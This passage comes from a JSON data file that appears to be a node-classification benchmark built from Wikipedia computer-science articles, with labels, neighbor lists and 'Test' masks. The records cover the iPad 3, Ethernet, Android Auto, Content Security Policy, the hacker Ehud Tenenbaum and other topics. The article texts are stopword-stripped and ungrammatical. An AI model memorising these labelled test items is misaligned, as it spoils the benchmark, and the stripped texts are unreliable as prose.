development providing access filesystem command-line tools however apple often patches exploits used jailbreaking teams ios updates ipad 3rd generation always jailbreakable device apple a5x soc 1 ghz dual-core 32-bit cortex-a9 cpu quad-core powervr sgx543mp4 gpu 1 gb ram 5-megapixel rear-facing camera capable 1080p video recording vga front-facing videophone camera designed facetime display resolution 2,048 1,536 qxga 3.1 million pixels—four times ipad 2—providing even scaling prior model new ipad thicker predecessor 0.6 mm heavier 51 grams wi-fi model 652 grams wi-fi cellular models 662 grams 49 grams heavier model 55 grams heavier verizon model compared respective ipad 2 3g models 3g ipad 2 613 grams verizon 3g ipad 2 607 grams four physical switches third-generation ipad including home button near display returns user home screen three plastic switches sides wake/sleep volume up/down plus software-controlled switch whose function varies software update display responds sensors ambient light sensor adjust screen brightness 3-axis accelerometer sense orientation switch portrait landscape modes unlike iphone ipod touch built-in applications work three orientations portrait landscape-left landscape-right ipad built-in applications support screen rotation four orientations including upside-down consequently device intrinsic native orientation relative position home button changes tablet manufactured either without capability communicate cellular network models connect wireless lan third-generation ipad optionally 16 32 64 gb internal flash memory expansion option apple sells camera connection kit sd card reader used transfer photos videos audio playback third-generation ipad frequency response 20 hz 20,000 hz without third-party software play following audio formats he-aac aac protected aac mp3 mp3 vbr audible formats 2 3 4 aea aax aax+ alac aiff wav preliminary tear-down third-generation ipad ihs isuppli showed likely costs 16 gb wi-fi cellular model 358.30 32 gb 375.10 64 gb 408.70 respectively ipad uses internal rechargeable lithium-ion polymer lipo battery batteries made taiwan simplo technology 60 dynapack international technology ipad designed charged high current 2 amps using included 10 w usb power adapter usb cord usb connector one end 30-pin dock connector end charged older usb port computer limited 500 milliamps 0.5 amps result ipad use powered computer may charge slowly high-power usb ports found newer computers accessories provide full charging capabilities apple claims battery provide 10 hours video 140 hours audio playback one month standby people say battery lasts 8 hours normal tasks like rechargeable battery ipad battery loses capacity time however ipad battery user-replaceable program similar ipod iphone battery-replacement programs apple promised replace ipad hold electrical charge refurbished unit fee us 99 plus 6.95 shipping user data preserved/transferred refurbished unit comes new case warranty refurbished unit may vary jurisdictions smart cover introduced ipad 2 screen protector magnetically attaches face ipad cover three folds allow convert stand also held together magnets smart cover also assume positions folding original ipad owners could purchase black case included similarly folding cover smart cover simpler easily detachable protects screen smart covers microfiber bottom cleans front ipad wakes unit cover removed comes five colors polyurethane expensive leather apple offers several accessories adapters proprietary 30-pin dock connector port besides headphone jack dock holds ipad upright angle dock connector audio line-out port ipad use bluetooth keyboards also work macs pcs ipad charged standalone power adapter wall charger compatible ipods iphones 10-watt charger included third-generation ipad received many positive reviews receiving praise retina display camera processor lte capabilities according walt mossberg things digital new model spectacular display ... seen mobile device holds crown best tablet planet jonathan spira writing frequent business traveler claimed seems make everything sharper clearer criticism followed news markets outside us tablet communicate lte due use 700 mhz 700/2,100 mhz frequencies respectively versus 800 mhz 1.8 ghz 2.6 ghz used elsewhere soon launch australian competition consumer commission accc took apple court breaking four provisions australian consumer law alleged apple promotion tablet australia 'ipad wi-fi 4g misled customers name indicates would work australia then-current 4g network apple responded offering full refund customers australia purchased wi-fi cellular model previously named wi-fi 4g ipad april 20 2012 apple stated hspa+ networks australia 4g even though speeds slower lte month later june 21 2012 apple sued 2.25 million false advertising australia advertisements apple claimed new ipad 4g lte compatible however n't work telstra lte mobile data network australia apple fined 2.25 million ordered pay 300,000 costs apple agreed remove references 4g lte capability uk advertising august done widespread 4g lte network uk time third-generation ipad would also incompatible future 4g lte networks roll-out advertising standards authority received consumer complaints matter apple offered refund customers bought device misled advertising result numerous complaints lawsuits apple regarding use term 4g advertisements prompted apple rename 4g service cellular change appearing apple website may 13 2012 many users reported abnormally high temperatures casing unit especially running 3d games used plugged rear new ipad became much hotter ipad 2 difference unplugged thermal imaging tests revealed ipad reach temperature warm touch uncomfortable held brief period follow-up report consumer reports said n't believe temperatures recorded tests new ipad represent safety concern claimed superiority a5x tegra 3 processor questioned around launch time competitor nvidia benchmarks later confirmed ipad superiority graphics performance benchmarks show tegra 3 greater performance areas consumer reports gave third-generation ipad top rating recommendation claiming tablet superb good fast 4g network retina display overall performance positive attributes elaborated display quality stating third-generation ipad best ’ seen ipad new display large enough improvement prompt consumer reports rate excellent consequently downgraded display tablets including ipad 2 excellent good preceding models see parent article ipad ios closed proprietary nature garnered criticism particularly digital rights advocates electronic frontier foundation computer engineer activist brewster kahle internet-law specialist jonathan zittrain free software foundation protested ipad introductory event targeted ipad defective design campaign pre-orders high third-generation ipad later orders quoted shipping times two three weeks order placed apple said customer response new ipad charts quantity available pre-order purchased despite delayed shipping many users chose purchase ipad online instead waiting line apple store approximately 750 people waited outside fifth avenue apple store new york city product release according apple press release three million units sold first three days ipad purchased mainly younger male demographic buyers either die-hard apple fans previously purchased ipad apple retailer dayton ohio claimed demand tablet chaotic claimed launch drastically significant ipad 2 launch q2 2012 apple would hit all-time high claiming 69.6 percent global tablet market",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      1074,
      8754,
      9784,
      8253,
      576,
      1090,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      8806,
      3691,
      2673,
      6258,
      10357,
      6264,
      4220,
      7292,
      2686,
      6783,
      7806,
      10365,
      10878,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      7844,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      8893,
      8896,
      6654,
      4807,
      4810,
      3790,
      1744,
      3286,
      9430,
      8921,
      3293,
      4318,
      9952,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      9964,
      10478,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      5927,
      10023,
      4910,
      4399,
      7983,
      7991,
      11066,
      2363,
      2365,
      2366,
      9022,
      11257,
      1346,
      10562,
      838,
      7496,
      8525,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      10602,
      3948,
      11629,
      10608,
      9084,
      7549,
      11649,
      2439,
      6023,
      3977,
      6537,
      6539,
      7052,
      1428,
      3483,
      10658,
      2979,
      9123,
      11173,
      8109,
      10675,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      7133,
      9182,
      4068,
      5093,
      487,
      488,
      2023,
      8170,
      5616,
      6130,
      7154,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 7698,
    "label": 5,
    "text": "Ethernet_physical_layer:ethernet physical layer ethernet physical layer physical layer functionality ethernet family computer network standards physical layer defines electrical optical properties physical connection device network network devices complemented mac layer logical link layer ethernet physical layer evolved existence starting 1980 encompasses multiple physical media interfaces several orders magnitude speed 1 mbit/s 400 gbit/s physical medium ranges bulky coaxial cable twisted pair optical fiber standardized reach 40 km general network protocol stack software work similarly physical layers many ethernet adapters switch ports support multiple speeds using autonegotiation set speed duplex best values supported connected devices practically relied ethernet twisted pair optical-fiber ports support multiple speeds autonegotiation fails multiple-speed devices sense speed used partner may result duplex mismatch rare exceptions 100base-tx port 10/100 also supports 10base-t 1000base-t port 10/100/1000 also supports 10base-t 100base-tx 10gbase-t port often also supports 1000base-t. 10 gigabit ethernet already used enterprise carrier networks 2007 40 gbit/s 100 gigabit ethernet ref name= 100 gbit/s ethernet /ref ratified 2017 fastest additions ethernet family 200 400 gbit/s generally layers named specifications 10 mbit/s encoding indicated variants use manchester code twisted pair layers use unique encoding often -t used reach especially optical connections defined maximum achievable link length guaranteed work channel parameters met modal bandwidth attenuation insertion losses etc better channel parameters often longer stable link length achieved vice versa link worse channel parameters also work shorter distance reach maximum distance meaning following sections provide brief summary official ethernet media types addition official standards many vendors implemented proprietary media types various reasons—often support longer distances fiber optic cabling early ethernet standards used manchester coding signal self-clocking adversely affected high-pass filters name standard clause common connectors link reach required cable description colspan=6 style= background-color f0f1f4 coaxial cable colspan=6 style= background-color f0f1f4 twisted-pair cable",
    "neighbors": [
      3847,
      5384,
      6670,
      5270,
      2968,
      2989,
      816,
      6834,
      2998,
      5185,
      7108,
      5321,
      10833,
      4691,
      2904,
      6361,
      3040,
      2785,
      8160,
      7400,
      5118
    ],
    "mask": "None"
  },
  {
    "node_id": 7699,
    "label": 3,
    "text": "Manycore_processor:manycore processor manycore processors specialist multi-core processors designed high degree parallel processing containing large number simpler independent processor cores tens cores thousands manycore processors used extensively embedded computers high-performance computing manycore processors distinct multi-core processors optimized outset higher degree explicit parallelism higher throughput lower power consumption expense latency lower single thread performance broader category multi-core processors contrast usually designed efficiently run parallel serial code therefore place emphasis high single thread performance e.g devoting silicon order execution deeper pipelines superscalar execution units larger general caches shared memory techniques devote runtime resources toward figuring implicit parallelism single thread used systems evolved continuously backward compatibility single core processors usually 'few cores e.g 2,4,8 may complemented manycore accelerator gpu heterogeneous system cache coherency issue limiting scaling multicore processors manycore processors may bypass tricks message passing scratchpad memory dma partitioned global address space read-only/non-coherent caches manycore processor using network chip local memories gives software opportunity explicitly optimise spatial layout tasks e.g seen tooling developed truenorth manycore processors may common conceptually technologies originating high performance computing clusters vector processors gpus may considered form manycore processor multiple shader processing units suitable highly parallel code high throughput extremely poor single thread performance number computers built multicore processors one million individual cpu cores examples include",
    "neighbors": [
      7173,
      9739,
      2066,
      5655,
      10779,
      10781,
      6181,
      10277,
      8231,
      6184,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      2140,
      4188,
      1122,
      4194,
      3175,
      5223,
      8810,
      4205,
      8815,
      3698,
      630,
      6774,
      8822,
      7802,
      9851,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      2210,
      6818,
      6821,
      5798,
      7852,
      4269,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      4308,
      10966,
      2264,
      731,
      11487,
      7911,
      10985,
      1770,
      5355,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      6909,
      10493,
      8447,
      1798,
      1801,
      6926,
      6415,
      785,
      1298,
      11539,
      7963,
      2339,
      6950,
      2345,
      810,
      4909,
      3886,
      309,
      8501,
      5948,
      4928,
      4417,
      8514,
      5956,
      4423,
      7497,
      330,
      1866,
      6476,
      8523,
      7505,
      9044,
      11604,
      344,
      2394,
      8543,
      1376,
      11618,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      11130,
      3457,
      9095,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      5029,
      9126,
      9132,
      10669,
      1967,
      2480,
      8624,
      10675,
      1461,
      1463,
      7607,
      4030,
      4036,
      453,
      3014,
      1480,
      466,
      2008,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      7142,
      2536,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 7700,
    "label": 2,
    "text": "Android_Auto:android auto android auto mobile app developed google mirror features android device smartphone car compatible in-dash information entertainment head unit android device paired head unit system mirrors qualified apps device vehicle display simple driver-friendly user interface supported apps include gps mapping/navigation music playback sms telephone web search system supports touchscreen button-controlled head unit displays although hands-free operation voice commands encouraged minimize driving distraction android auto part open automotive alliance announced june 25 2014 joint effort 28 automobile manufacturers nvidia tech supplier available 36 countries common way android auto deployed via android mobile device running android auto app acting master vehicle dashboard head unit supports functionality user android device connected vehicle head unit serve external display android device presenting supported software car-specific user interface provided android auto app android auto first iterations device required connected via usb car alternatively november 2016 google added option run android auto regular app android device i.e. tethered car head unit allows used android-powered head units simply personal phone tablet vehicle addition january 1 2018 announced jvckenwood would exhibiting wireless android auto-enabled head units ces 2018 would capable operating without need wired connection may 2019 android auto available 36 countries availability apps system varies android auto sdk released allowing third parties modify apps work android auto initially apis music messaging apps would available expected android auto mobile device access several automobile sensors inputs gps high-quality gps antennas steering-wheel mounted buttons sound system directional speakers directional microphones wheel speed compass mobile antennas etc also partial access car data feature still development ces 2018 google confirmed google assistant would coming android auto later year currently supported apps include google maps waze popular music players google play music youtube music amazon music apple music spotify messaging apps including whatsapp facebook messenger google hangouts skype telegram may 2015 hyundai became first manufacturer offer android auto support making available first 2015 hyundai sonata automobile manufacturers offer android auto support cars include abarth acura alfa romeo audi bentley buick cadillac chevrolet chrysler dodge fiat ford gmc genesis holden honda hyundai infiniti jaguar land rover jeep kia lamborghini lexus lincoln mahindra mahindra maserati mazda mercedes-benz mitsubishi nissan opel peugeot ram renault seat škoda ssangyong subaru suzuki tata motors cars toyota volkswagen volvo additionally aftermarket car-audio systems supporting android auto add technology host vehicles including pioneer kenwood panasonic sony may 2019 italy filed antitrust complaint targeting android auto citing google policy allowing third-party media messaging apps platform prevented enel offering app locating vehicle charging stations",
    "neighbors": [
      4096,
      5637,
      8719,
      3600,
      9244,
      11294,
      1578,
      10284,
      5677,
      3633,
      1083,
      6212,
      69,
      8262,
      6216,
      4683,
      4685,
      11343,
      3664,
      8280,
      8285,
      2658,
      8821,
      11391,
      1670,
      7816,
      5262,
      6800,
      11408,
      10393,
      8858,
      7835,
      673,
      7841,
      8870,
      1191,
      1203,
      7359,
      196,
      3269,
      3782,
      8907,
      10445,
      3795,
      1240,
      8413,
      9949,
      6367,
      1255,
      236,
      8940,
      9970,
      7926,
      3836,
      5892,
      7428,
      8455,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      7983,
      3380,
      5431,
      2875,
      3900,
      10045,
      10557,
      11590,
      11592,
      11082,
      332,
      9039,
      3409,
      8019,
      2901,
      5467,
      3940,
      5483,
      7548,
      1409,
      4995,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      2978,
      1959,
      937,
      5546,
      3499,
      6057,
      7595,
      9160,
      4044,
      4048,
      2001,
      479,
      488,
      6632,
      1516,
      5100,
      5613,
      9712,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7701,
    "label": 2,
    "text": "Windows_Push_Notification_Service:windows push notification service windows push notification service commonly referred windows notification service wns notification service developed microsoft devices running microsoft windows platforms allows developers send push data toast tile updates windows universal windows platform applications implement feature designed successor microsoft push notification service first supported windows 8 subsequently windows phone 8.1 upon release windows push notification service wns designed successor microsoft push notification service mpns supported natively windows phone 8 operating system developers still use mpns apps installed newer versions windows mobile windows phone 8 windows phone 8.1 windows application already registered use mpns converted microsoft silverlight application modified re-target new platform 2015 microsoft announced wns would expanded utilize universal windows platform architecture allowing push data sent windows 10 windows 10 mobile xbox well supported platforms using universal api calls post requests 2015 build keynote microsoft announced universal windows platform bridge would allow android ios software ported windows 10 mobile published windows store august 2015 version microsoft android bridge toolset reported leaked available internet along documentation leaked toolset required developers register use wns send notification data ported applications would allow google cloud messaging used instead microsoft later discontinued android bridge project favor continuing support ios application porting instead 2016 build keynote microsoft announced update wns windows 10 operating system allow android ios devices forward push notifications received windows 10 viewed discarded architecture windows push notification service similar predecessor consists servers interfaces generate maintain store authenticate unique identifiers called channel uri identifiers devices register use service device enrolls receive data notification information using wns first sends device registration request wns network wns network acknowledges request responds device unique channel uri identifier typically device send identifier server owned developer stored used sending notifications app developer wishes transmit notification wns data device transmit post request wns network network acknowledge authenticate request authentication succeeds data transmitted enqueued sent device wns network using channel uri identifier windows 10 connected vpn disallows split tunneling wpnuserservice_ unique id process bypasses tunnel connecting directly microsoft behavior reveal real ip address host observed windows resource monitor",
    "neighbors": [
      8262,
      11559,
      3881,
      6797,
      7983,
      5647,
      9903,
      10900
    ],
    "mask": "None"
  },
  {
    "node_id": 7702,
    "label": 2,
    "text": "OpenBSD_version_history:openbsd version history following table summarizes version history openbsd operating system",
    "neighbors": [
      6657,
      9090,
      1668,
      9223,
      10631,
      2825,
      3465,
      8073,
      1932,
      274,
      3603,
      3222,
      2584,
      10105,
      8863,
      3237,
      11563,
      6702,
      7983,
      9520,
      9137,
      11698,
      823,
      5176,
      9151,
      6464,
      9153,
      9665,
      2245,
      841,
      842,
      1993,
      3404,
      5065,
      8778,
      11086,
      4561,
      5970,
      4438,
      5084,
      889,
      865,
      8545,
      7139,
      1637,
      10341,
      3431,
      4071,
      11112,
      5230,
      1775,
      8816,
      10102,
      1785,
      8954
    ],
    "mask": "Test"
  },
  {
    "node_id": 7703,
    "label": 4,
    "text": "Ehud_Tenenbaum:ehud tenenbaum ehud udi tenenbaum born august 29 1979 also known analyzer israeli cracker tenenbaum born hod hasharon 1979 known infamous hacker alias pink pony tenenbaum became widely famous 1998 aged 19 years head small group hackers arrested hacking computers belonging nasa pentagon u.s. air force u.s. navy knesset mit american israeli universities dharma comtec lawrence livermore national laboratory federally funded research sites computer israeli president ezer weizman well attempting infiltrate israel defense forces classified files also hacked computers palestinian groups claimed destroyed website hamas tenenbaum installed servers packet analyzer trojan horse software time then-us deputy defense secretary john hamre insisted organized systematic attack date us military systems military thought witnessing sophisticated iraqi 'information warfare effort stop supposed iraqi hackers united states government assembled agents fbi air force office special investigations nasa us department justice defense information systems agency nsa cia government worried warning briefings went way president united states investigation code-named solar sunrise eventually snared two california teenagers screen names mac stimpy iraqi infowarriors arrest subsequent probe led us investigators tenenbaum arrested israeli police given evidence tenenbaum activities later fbi sent agents israel question tenenbaum sentenced tenenbaum served briefly israel defense forces released soon thereafter involved traffic collision 2001 tenenbaum pleaded guilty stating n't attempting infiltrate computer systems get hold secrets rather prove systems flawed tenenbaum sentenced year half prison served 8 months following deri law attack fbi made short 18 minutes training video called solar sunrise dawn new threat sold part hacker defense course discontinued september 2004 2003 freed prison tenenbaum founded information security company called 2xs september 2008 following investigation canadian police us secret service tenenbaum three accomplices arrested montreal tenenbaum charged six counts credit card fraud sum approx us 1.5 million u.s. investigators suspected tenenbaum part scam hackers penetrated financial institutions around world steal credit card numbers sold numbers people used perpetrate massive credit card fraud later extradited united states stand trial custody us marshals year august 2010 released bond agreeing plead guilty july 2012 tenenbaum accepted plea bargain may involved cooperation investigation new york district judge edward korman sentenced tenenbaum time already served prison tenenbaum also ordered pay 503,000 given three years probation",
    "neighbors": [
      9440,
      7887,
      7798,
      2135,
      5373
    ],
    "mask": "None"
  },
  {
    "node_id": 7704,
    "label": 4,
    "text": "MyGreenElectronics:mygreenelectronics two main ways consumers use site aside immediate functional uses site educates public reduce energy usage rethink way consume electronics products order reduce amount electricity consumer products consume advises consumers look energy star logo products buy comprehensive list advice recommendations available reduce section site thus encourages consumers rethink ways make smarter environmentally friendlier choices purchasing electronics products entities united states abroad raise serious concerns electronics recycling groups concerned workers actual recycling exposed toxins harmful health mygreenelectronics represents consumer-driven voluntary approach recycling people believe government compel consumers pay advance fee future recycling cost product others believe manufacturers electronics take full responsibility recycling disposal products",
    "neighbors": [
      7579
    ],
    "mask": "None"
  },
  {
    "node_id": 7705,
    "label": 5,
    "text": "Authenticated_Identity_Body:authenticated identity body authenticated identity body aib method allowing parties network share authenticated identity thereby increasing integrity sip communications aibs extend authentication methods like s/mime provide specific mechanism introduce integrity sip transmissions parties transmitting aibs cryptographically sign subset sip message headers signatures assert message originator identity meet requirements reference integrity example defending replay attacks additional sip message headers 'date 'contact may optionally included aib aib described discussed rfc 3893 reasons end-to-end privacy may also desirable encrypt aibs ... encryption aibs entails holder specific key decrypt body single key could distributed throughout network hosts exist common policies security aib therefore predicated secure distribution key however networks federations trusted hosts common policy widespread distribution decryption key could appropriate telephone networks example might require model aib encrypted aib encrypted signed ... unless course signed mrs. l rin va",
    "neighbors": [
      10271
    ],
    "mask": "None"
  },
  {
    "node_id": 7706,
    "label": 5,
    "text": "LocalTalk:localtalk localtalk particular implementation physical layer appletalk networking system apple computer localtalk specifies system shielded twisted pair cabling plugged self-terminating transceivers running rate 230.4 kbit/s csma/ca implemented random multiple access method networking envisioned macintosh planning mac given expensive rs-422 capable serial ports ports driven zilog scc could serve either standard uart handle much complicated hdlc protocol packet oriented protocol incorporated addressing bit-stuffing packet checksumming hardware coupled together rs422 electrical connections provided reasonably high-speed data connection 230.4 kbit/s bit rate highest series standard serial bit rates 110 150 300 600 1200 2400 4800 9600 14400 19200 28800 38400 57600 115200 230400 derived 3.6864 mhz clock customary divide-by-16 clock frequency 3.6864 mhz chosen part support common asynchronous baud rates 38.4 kbit/s using scc internal baud-rate generator scc internal pll used lock clock embedded localtalk serial data stream using fm0 encoding method divide-by-16 setting pll yielded fastest rate available namely 230.4 kbit/s originally released appletalk personal network localtalk used shielded twisted-pair cable 3-pin mini-din connectors cables daisy-chained transceiver transceiver transceiver two 3-pin mini-din ports cable connect mac de-9 serial connector later mac plus introduced 8-pin mini-din serial connector transceivers updated well variation localtalk called phonenet introduced farallon computing used standard unshielded side-by-side telephone wire six-position modular connectors popular rj11 telephone connectors connected phonenet transceiver instead expensive shielded twisted-pair cable addition lower cost phonenet-wired networks reliable due connections difficult accidentally disconnect addition used outer pair modular connector could travel many pre-existing phone cables jacks inner pair use rj11 telephone service phonenet also able use office existing phone wire allowing entire floors computers easily networked farallon introduced 12-port hub made constructing star topology networks 48 devices easy adding jacks workstations jumpers phone closet factors led phonenet largely supplanting localtalk wiring low-cost networking useful life phonenet extended introduction localtalk switching technology tribe computer works introduced 1990 tribe localswitch 16 port packet switch designed speed overloaded phonenet networks widespread availability ethernet-based networking early 1990s led swift disappearance localtalk phonenet remained use time low-cost applications applications ethernet available ethernet became universal pc offices installing anyway early models power macintosh macintosh quadra supported 10base-t via apple attachment unit interface still supporting localtalk-based networking older macintosh computers built-in ethernet expansion options high speed scsi-to-ethernet adapter available particularly popular powerbooks enabled earliest macintosh models access high speed ethernet network release imac 1998 traditional mac serial port — thus ability use localtalk phonenet — disappeared new models macintosh localtalk-to-ethernet bridges introduced allow legacy devices especially printers function newer networks old macintosh computers localtalk remains option localtalk connector distinction first use apple unified appletalk connector family design created brad bissell frogdesign using rick meadows apple icon family designs localtalk connectors first released january 1985 connect laserwriter printer initially macintosh family computers integral part newly announced macintosh office however well past move ethernet connector design continued used apple peripherals cable connectors well influencing connectors used throughout industry whole",
    "neighbors": [
      9732,
      7697,
      4114,
      6165,
      11289,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      8783,
      4180,
      10838,
      10840,
      9312,
      9826,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      2735,
      7865,
      4283,
      7869,
      8893,
      8896,
      1734,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      1772,
      10481,
      11011,
      1290,
      3338,
      781,
      4879,
      784,
      8480,
      11554,
      10023,
      4910,
      4399,
      11066,
      9022,
      1346,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      8109,
      2492,
      446,
      7614,
      5058,
      6082,
      10691,
      2502,
      456,
      1482,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      5601,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 7707,
    "label": 9,
    "text": "Fuzzy_Control_Language:fuzzy control language fuzzy control language fcl language implementing fuzzy logic especially fuzzy control standardized iec 61131-7 domain-specific programming language features unrelated fuzzy logic impossible even print hello world therefore one write program fcl one may write part fcl rule 0 temperature cold output high fcl entirely complete fuzzy language instance support hedges adverbs modify set instance programmer write however programmer simply define new sets cold high fcl also lacks support higher-order fuzzy sets subsets none features essential fuzzy control although may nice iec 1131-7 cd1",
    "neighbors": [
      578,
      8262
    ],
    "mask": "None"
  },
  {
    "node_id": 7708,
    "label": 4,
    "text": "Content_Security_Policy:content security policy content security policy csp computer security standard introduced prevent cross-site scripting xss clickjacking code injection attacks resulting execution malicious content trusted web page context candidate recommendation w3c working group web application security widely supported modern web browsers csp provides standard method website owners declare approved origins content browsers allowed load website—covered types javascript css html frames web workers fonts images embeddable objects java applets activex audio video files html5 features standard originally named content restrictions proposed robert hansen 2004 first implemented firefox 4 quickly picked browsers version 1 standard published 2012 w3c candidate recommendation quickly versions level 2 published 2014. draft level 3 developed new features quickly adopted web browsers following header names use part experimental csp implementations website declare multiple csp headers also mixing enforcement report-only ones header processed separately browser csp also delivered within html code using html meta tag although case effectiveness limited support sandbox directive also available internet explorer 10 internet explorer 11 using experimental codice_3 header number web application frameworks support csp example angularjs natively django middleware instructions ruby rails posted github web framework support however required csp contents somehow depend web application state—such usage codice_5 origin otherwise csp rather static delivered web application tiers application example load balancer web server december 2015 december 2016 methods bypassing codice_6 whitelisting origins published january 2016 another method published leverages server-wide csp whitelisting exploit old vulnerable versions javascript libraries hosted server frequent case cdn servers may 2017 one method published bypass csp using web application frameworks code codice_1 header present server response compliant client enforces declarative whitelist policy one example goal policy stricter execution mode javascript order prevent certain cross-site scripting attacks practice means number features disabled default using csp new application may quite straightforward especially csp-compatible javascript framework existing applications may require refactoring—or relaxing policy recommended coding practice csp-compatible web applications load code external source files codice_18 parse json instead evaluating use codice_19 set event handlers time requested resource script execution violates policy browser fire codice_20 request value specified codice_21 containing details violation csp reports standard json structures captured either application api public csp report receivers according original csp 1.0 processing model 2012–2013 csp interfere operation browser add-ons extensions installed user feature csp would effectively allowed add-on extension bookmarklet inject script web sites regardless origin script thus exempt csp policies however policy since modified csp 1.1 following wording note use word may instead prior absolute wording note user agents may allow users modify bypass policy enforcement user preferences bookmarklets third-party additions user agent mechanisms.the absolute wording used browser users request/demand adherence policy changes installed popular browsers firefox chrome safari support particularly contentious sites like twitter github started using strong csp policies 'broke use bookmarklets w3c web application security working group considers script part trusted computing base implemented browser however argued working group representative cox communications exemption potential security hole could exploited malicious compromised add-ons extensions",
    "neighbors": [
      10368,
      7044,
      3462,
      7175,
      8584,
      9736,
      6171,
      5543,
      10026,
      11345,
      11221,
      5078,
      2777,
      8923,
      5724,
      225,
      101,
      4198,
      487,
      5622,
      2169,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 7709,
    "label": 3,
    "text": "Torch_Triple_X:torch triple x torch triple x xxx unix workstation computer produced british company torch computers launched 1985 based motorola 68010 microprocessor ran version unix system v. triple x based 8 mhz 68010 cpu hitachi 6303 service processor cpu accompanied 68451 memory management unit 68450 dma controller vmebus bbc micro-compatible 1mhz bus expansion buses provided scsi host adapter optional ethernet interface rs-423 x.25-compatible synchronous serial ports provided latter feature made triple x attractive uk academic community x.25 networks prevalent time standard ram capacity 1 mb expandable 7 mb via vme cards 720 kb 5.25 floppy disk drive st-506-compatible 20 mb hard disk fitted standard interfaced scsi bus via omti adapter either 10 13 inch colour monitor supplied two graphics modes available 720 × 256 pixels four colours 720 × 512 two colours triple x novel touch-sensitive soft power switch switching commanded operating system shut gracefully powering triple x firmware called caretaker native operating system uniplus+ unix system v release 2 graphical user interface called opentop also included standard quad x enhanced version triple x 68020 processor three vme expansion slots produced small numbers torch became insolvent",
    "neighbors": [
      8900,
      1158,
      6187,
      7983,
      1776,
      2995,
      3350,
      7286,
      2073
    ],
    "mask": "Test"
  },
  {
    "node_id": 7710,
    "label": 8,
    "text": "Click_path:click path click path clickstream sequence hyperlinks one website visitors follows given site presented order viewed visitor click path may start within website separate 3rd party website often search engine results page continues sequence successive webpages visited user click paths take call data match ad sources keywords and/or referring domains order capture data clickstream analysis useful web activity analysis software testing market research analyzing employee productivity navigating world wide web user agent web browser makes requests another computer known web server every time user selects hyperlink web servers store information sequence links user clicks visiting websites host log files site operator ’ benefit information interest vary may include information downloaded webpage visited previously webpage visited afterwards duration time spent page etc information useful client/user identified done website registration record matching client ’ internet service provider isp storage also occur router proxy server ad server data mining column-oriented dbms integrated olap systems used conjunction clickstreams better record analyze data use clickstream data raise privacy concerns especially since internet service providers resorted selling users clickstream data way enhance revenue 10-12 companies purchase data typically 0.40/month per user practice may directly identify individual users often possible indirectly identify specific users example aol search data scandal consumers unaware practice potential compromising privacy addition isps publicly admit practice world online shopping grows becoming easier privacy individuals become exploited many cases email addresses phone numbers personal information stolen illegally shoppers clients many used third parties third parties range advertisers hackers consumers actually benefit gaining targeted advertising deals harmed lack privacy world technology grows consumers risk losing privacy clickstreams used allow user see allow easily return page already visited function already incorporated browsers clickstream display specific time position individuals browsed closed website web pages viewed duration spent page also show pages viewed frequently abundant information analyzed individuals check visitors clickstream association statistical information visiting length retrieval words isp countries explorers etc process enables individuals know visitors deeply webmasters gain insight visitors site using clickstream data neutral sense dataset neutral data used various scenarios one marketing additionally webmaster researcher blogger person website learn improve site growing e-commerce industry made necessary tailor needs preferences consumers click path data used personalize product offerings using previous click path data websites predict products user likely purchase click path data contain information user ’ goals interests knowledge therefore used predict future actions decisions using statistical models websites potentially increase operating profits streamlining results based user likely purchase analyzing data clients visit company website important order remain competitive analysis used generate two findings company first analysis user ’ clickstream using website reveal usage patterns turn gives heightened understanding customer behaviour use analysis creates user profile aids understanding types people visit company ’ website discussed van den poel buckinx 2005 clickstream analysis used predict whether customer likely purchase e-commerce website clickstream analysis also used improve customer satisfaction website company generate business advantage used assess effectiveness advertising web page site researchers stand behind click path analysis note path analytical method estimates system equations specify possible causal linkages among set variables click paths enable researchers break correlations among variables direct indirect spurious components finally click path analysis helps researchers disentangle complex interrelationships among variables identify significant pathways involved predicting outcome even advantages technique still critiqued many due large margin error model must assume variable exact manifestation theoretical concepts underlying reasonably free measurable error another casualty hypothesized model path must flow one direction feedback loops bidirectional causality otherwise model solved ordinary least squares regression techniques lastly models based correlations path analysis demonstrate causality direction causal effects ” due limitations many believe click 